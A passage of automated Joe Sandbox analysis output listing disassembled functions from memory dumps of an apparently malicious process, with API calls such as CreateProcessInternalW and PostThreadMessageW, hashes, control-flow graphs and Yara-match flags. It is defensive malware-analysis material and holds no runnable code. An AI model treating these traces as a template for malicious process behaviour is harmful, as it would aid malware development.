                                                        • Instruction Fuzzy Hash: 5A01C471A416097BD611EBA8CC42FEB736CEF85714F004219FB59AF181DBB17904C7A5
                                                        APIs
                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 003B8197
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 107a58e02835addb894d731512d60433070ccd53c3aca26d0bedc16aa1168d12
                                                        • Instruction ID: 2b66418764eb2a6371b8ed5eda663bb221320f7de9dc6497cb41ff32802c4441
                                                        • Opcode Fuzzy Hash: 107a58e02835addb894d731512d60433070ccd53c3aca26d0bedc16aa1168d12
                                                        • Instruction Fuzzy Hash: 04E04F312002057FD510EA5EDC41FDB776CDBC6710F014415FA08AB142CA70794186E1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 07997d2643e717431eec8c76e3c3a9e7640496aa4c78b6ca675e0f415c0e4530
                                                        • Instruction ID: 079cb37b3a56eda390ab8a7259cac5ab094a9c43d2d405f0053ead97f0da891d
                                                        • Opcode Fuzzy Hash: 07997d2643e717431eec8c76e3c3a9e7640496aa4c78b6ca675e0f415c0e4530
                                                        • Instruction Fuzzy Hash: 1290023160981012964071584884547400597E0301B55C011F4428674C8A548E966761
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: cafa43d2f52950c27755f6a4d4b830b88cbce59f1088a192353cb6ecb9b7ddc3
                                                        • Instruction ID: 7275cad34dbdf6ed9039e85d212da973a2721179c23879528fcfacda4164552f
                                                        • Opcode Fuzzy Hash: cafa43d2f52950c27755f6a4d4b830b88cbce59f1088a192353cb6ecb9b7ddc3
                                                        • Instruction Fuzzy Hash: 0890026160551042464071584804407600597E1301395C115B4558670C86588D95A669
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b09870c018556dbeaab9b5f19c98240fec5dcb14f4a874ce1550a22fd1c37e36
                                                        • Instruction ID: a6f4fb239ff7628fee744fe3e929e2d65489eefbb3a3bb3648d06853797bf721
                                                        • Opcode Fuzzy Hash: b09870c018556dbeaab9b5f19c98240fec5dcb14f4a874ce1550a22fd1c37e36
                                                        • Instruction Fuzzy Hash: 80900435315410030705F55C07045070047C7D5351355C031F501D770CD771CDF17531
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 0817a6151a1c70c656b71911cfdfd60dfcd58ac9ff08bca888f210ec4e844ad4
                                                        • Instruction ID: 73a539ba60c49456c14b76eb568e697a5b794c95457bfd4fa78bd7a7473cfdbe
                                                        • Opcode Fuzzy Hash: 0817a6151a1c70c656b71911cfdfd60dfcd58ac9ff08bca888f210ec4e844ad4
                                                        • Instruction Fuzzy Hash: 52900225225410020645B558060450B044597D6351395C015F541A6B0CC6618DA56721
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9bd9bca4b54c6c4c934f0250fd2f6ee035b00078a6b848cf7c4f44c64a7e4710
                                                        • Instruction ID: 1e8a292fdf40ebbcfff905dd645bef06b6ff0ba8c9dcd419ba68d7d1e7de25aa
                                                        • Opcode Fuzzy Hash: 9bd9bca4b54c6c4c934f0250fd2f6ee035b00078a6b848cf7c4f44c64a7e4710
                                                        • Instruction Fuzzy Hash: 0D90023120541802D6807158440464B000587D1301F95C015B4029774DCA558F997BA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8a9790a692d668e8fbd47d551280a8c45269587ac277621488b191e7eda18896
                                                        • Instruction ID: 1dc5cc322c22f5a8e20ed3c3c17c2c3d9e52c107bb2ad2bcf9a42a165ae1ab77
                                                        • Opcode Fuzzy Hash: 8a9790a692d668e8fbd47d551280a8c45269587ac277621488b191e7eda18896
                                                        • Instruction Fuzzy Hash: 5590023120945842D64071584404A47001587D0305F55C011B40687B4D96658E95BA61
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 77cee88308ed050eafdcc4a64823dd485b3e6b4f246b5fb5f438d385781c9b1c
                                                        • Instruction ID: b0c549278175b5e6c3b595f0f808145b3ad20646f737e822292d3757f21ad3e7
                                                        • Opcode Fuzzy Hash: 77cee88308ed050eafdcc4a64823dd485b3e6b4f246b5fb5f438d385781c9b1c
                                                        • Instruction Fuzzy Hash: 6190023160941802D65071584414747000587D0301F55C011B4028774D87958F957AA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2832ab345c7bb37d80da122354320c14c97fbc3445c0df17234a9bb5bfb4294e
                                                        • Instruction ID: f9589adc2ae856012a8325e8a2ef09f4fb5829cfa5def46800abc27881ab83ca
                                                        • Opcode Fuzzy Hash: 2832ab345c7bb37d80da122354320c14c97fbc3445c0df17234a9bb5bfb4294e
                                                        • Instruction Fuzzy Hash: CB90026120641003460571584414617400A87E0201B55C021F50186B0DC5658DD17525
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 66551d2756234cd015a6e304372f1371259bc59d485b1d0d7a0c41d1c409a4e0
                                                        • Instruction ID: 02f9c8de9f9d12196a1af42e082ef54823302b95a2537d6c1ca66f3f8f8dcf41
                                                        • Opcode Fuzzy Hash: 66551d2756234cd015a6e304372f1371259bc59d485b1d0d7a0c41d1c409a4e0
                                                        • Instruction Fuzzy Hash: 8E90026120581403D64075584804607000587D0302F55C011B6068675E8A698D917535
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f672cc44561e40f4d3de84df2e6572a6a73c6aad4e6d9ee81c920b5e6b10a510
                                                        • Instruction ID: 603140d49c61f0040e258042b08ebd9adc6a2c1a2efdba25af0d7e3b0f225e29
                                                        • Opcode Fuzzy Hash: f672cc44561e40f4d3de84df2e6572a6a73c6aad4e6d9ee81c920b5e6b10a510
                                                        • Instruction Fuzzy Hash: F390022160541502D60171584404617000A87D0241F95C022B5028675ECA658ED2B531
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: fe44b4fa56d98218db91432a2e99cb56a40adeac5c462f1fa8cf1ddc5221a3f8
                                                        • Instruction ID: d02f6407626892903626417e7ac6c130ce31db8e35a84a6b4b6345a9f458f2b4
                                                        • Opcode Fuzzy Hash: fe44b4fa56d98218db91432a2e99cb56a40adeac5c462f1fa8cf1ddc5221a3f8
                                                        • Instruction Fuzzy Hash: BD900221215C1042D70075684C14B07000587D0303F55C115B4158674CC9558DA16921
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b437b20381b452aacd1e2906475471946a9a53caf27f3a4460decd8534bf93e5
                                                        • Instruction ID: a3a5dba3ea006bb238fb2f5399bf00001470e821266f148dfd28afec661086a5
                                                        • Opcode Fuzzy Hash: b437b20381b452aacd1e2906475471946a9a53caf27f3a4460decd8534bf93e5
                                                        • Instruction Fuzzy Hash: D1900221605410424640716888449074005ABE1211755C121B499C670D85998DA56A65
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9371825fd1a7ce6d811ce43193e56c8b2fc6948d837c41d28e0a21a44d7bb7eb
                                                        • Instruction ID: a07d3f86c72879873b7b74d59e79ce0c977ed8cb8d12b61064acccec3b01a41e
                                                        • Opcode Fuzzy Hash: 9371825fd1a7ce6d811ce43193e56c8b2fc6948d837c41d28e0a21a44d7bb7eb
                                                        • Instruction Fuzzy Hash: A790026134541442D60071584414B070005C7E1301F55C015F5068674D8659CD927526
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8f88304f5077722e096e269bc4acf1495483af360050b0f1d5b15503434d7b4e
                                                        • Instruction ID: 0ebd36547ef6ef817818d2419c485fb04466db6c1c7336e13dc2ae1432214cb3
                                                        • Opcode Fuzzy Hash: 8f88304f5077722e096e269bc4acf1495483af360050b0f1d5b15503434d7b4e
                                                        • Instruction Fuzzy Hash: 7D90023120541402D60075985408647000587E0301F55D011B9028675EC6A58DD17531
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: be3c547567b1ebcdc2d0a5388873171ebb7a80f02c6aa29760c68c391a8e8260
                                                        • Instruction ID: 9a490e003637d47e766aae449772d74698e4c9be368d248140789cdbdbf19a9b
                                                        • Opcode Fuzzy Hash: be3c547567b1ebcdc2d0a5388873171ebb7a80f02c6aa29760c68c391a8e8260
                                                        • Instruction Fuzzy Hash: 9490023120549802D6107158840474B000587D0301F59C411B8428778D86D58DD17521
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 156c68670650f9c4d2697b59ab4e316a8cd837cbec4910b991b9ad66a7e6f129
                                                        • Instruction ID: 2a3393c0fe4c0394fe252dbbae742f0afb424e80a835388ab3571a5e1a3aa97b
                                                        • Opcode Fuzzy Hash: 156c68670650f9c4d2697b59ab4e316a8cd837cbec4910b991b9ad66a7e6f129
                                                        • Instruction Fuzzy Hash: E690023120541842D60071584404B47000587E0301F55C016B4128774D8655CD917921
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 61f66ce758b59145f8507758eec223b4a94ffab668c5b73935d7a4d7c5f5c898
                                                        • Instruction ID: 785a58c25bc31000a8a12d54e956d92438f3e7bcf9fae7b2ff809259533babeb
                                                        • Opcode Fuzzy Hash: 61f66ce758b59145f8507758eec223b4a94ffab668c5b73935d7a4d7c5f5c898
                                                        • Instruction Fuzzy Hash: 27900221246451525A45B1584404507400697E0241795C012B5418A70C85669D96EA21
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 503 3a0a80-3a0aa7 504 3a0aa9-3a0ad0 503->504 505 3a0ad6-3a0adb 503->505 504->505 506 3a0add-3a0ae5 505->506 507 3a0b04-3a0b1d 505->507 509 3a0b1f-3a0b27 507->509 510 3a0b32-3a0b37 507->510 511 3a0b29 509->511 512 3a0b6c-3a0b89 call 3a4530 call 391410 call 3b13c0 509->512 513 3a0b2b-3a0b2e 511->513 514 3a0ba4-3a0baa 511->514 516 3a0b8e-3a0ba1 512->516 513->516 517 3a0b30-3a0b31 513->517 519 3a0bca-3a0bd0 514->519 520 3a0bac-3a0bbb PostThreadMessageW 514->520 516->514 517->510 520->519 522 3a0bbd-3a0bc7 520->522 522->519
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 0-4090662830

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 525 3a0b40-3a0b52 526 3a0b5a-3a0baa call 3baae0 call 3a4530 call 391410 call 3b13c0 525->526 527 3a0b55 call 3ba0d0 525->527 538 3a0bca-3a0bd0 526->538 539 3a0bac-3a0bbb PostThreadMessageW 526->539 527->526 539->538 540 3a0bbd-3a0bc7 539->540 540->538
                                                        APIs
                                                        • PostThreadMessageW.USER32(410-3696,00000111,00000000,00000000), ref: 003A0BB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 1836367815-4090662830

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 541 3a0b42-3a0baa call 3ba0d0 call 3baae0 call 3a4530 call 391410 call 3b13c0 554 3a0bca-3a0bd0 541->554 555 3a0bac-3a0bbb PostThreadMessageW 541->555 555->554 556 3a0bbd-3a0bc7 555->556 556->554
                                                        APIs
                                                        • PostThreadMessageW.USER32(410-3696,00000111,00000000,00000000), ref: 003A0BB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 1836367815-4090662830
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 003B2D6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        APIs
                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,3~:,00000010,?,?,?,00000044,?,00000010,003A7E33,?,?,?), ref: 003B85B3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID: 3~:
                                                        • API String ID: 2186235152-2933657361
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 003AED27
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID: @J7<
                                                        • API String ID: 2538663250-2016760708
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 003AED27
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID: @J7<
                                                        • API String ID: 2538663250-2016760708
                                                        APIs
